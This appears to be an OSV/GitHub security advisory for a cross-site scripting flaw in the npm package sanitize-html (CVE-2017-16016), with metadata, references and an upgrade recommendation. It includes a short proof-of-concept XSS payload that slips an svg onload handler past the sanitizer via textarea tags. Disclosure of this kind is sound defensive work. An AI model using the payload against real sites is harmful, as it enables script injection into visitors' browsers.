GHSA-xc6g-ggrc-qq4r
Suggest an improvement- Source
- https://github.com/advisories/GHSA-xc6g-ggrc-qq4r
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/11/GHSA-xc6g-ggrc-qq4r/GHSA-xc6g-ggrc-qq4r.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-xc6g-ggrc-qq4r
- Aliases
- Published
- 2018-11-09T17:47:23Z
- Modified
- 2023-11-08T03:58:59.829428Z
- Summary
- Cross-Site Scripting in sanitize-html
- Details
-
Affected versions of
sanitize-htmlare vulnerable to cross-site scripting when allowedTags includes at least onenonTextTag.Proof of Concept
var sanitizeHtml = require('sanitize-html'); var dirty = '!<textarea></textarea><svg/onload=prompt`xs`></textarea>!'; var clean = sanitizeHtml(dirty, { allowedTags: [ 'textarea' ] }); console.log(clean); // !<textarea></textarea><svg/onload=prompt`xs`></textarea>!Recommendation
Update to version 1.11.4 or later.
- Database specific
{ "nvd_published_at": null, "cwe_ids": [ "CWE-79" ], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2020-06-16T22:02:52Z" }- References
-
- https://nvd.nist.gov/vuln/detail/CVE-2017-16016
- https://github.com/punkave/sanitize-html/issues/100
- https://github.com/punkave/sanitize-html/commit/5d205a1005ba0df80e21d8c64a15bb3accdb2403
- https://github.com/punkave/sanitize-html/commit/5d205a1005ba0df80e21d8c64a15bb3accdb2403)))
- https://github.com/advisories/GHSA-xc6g-ggrc-qq4r
- https://npmjs.com/package/sanitize-html#discarding-the-entire-contents-of-a-disallowed-tag
- https://www.npmjs.com/advisories/154
Affected packages
npm / sanitize-html
Package
- Name
- sanitize-html
- View open source insights on deps.dev
- Purl
- pkg:npm/sanitize-html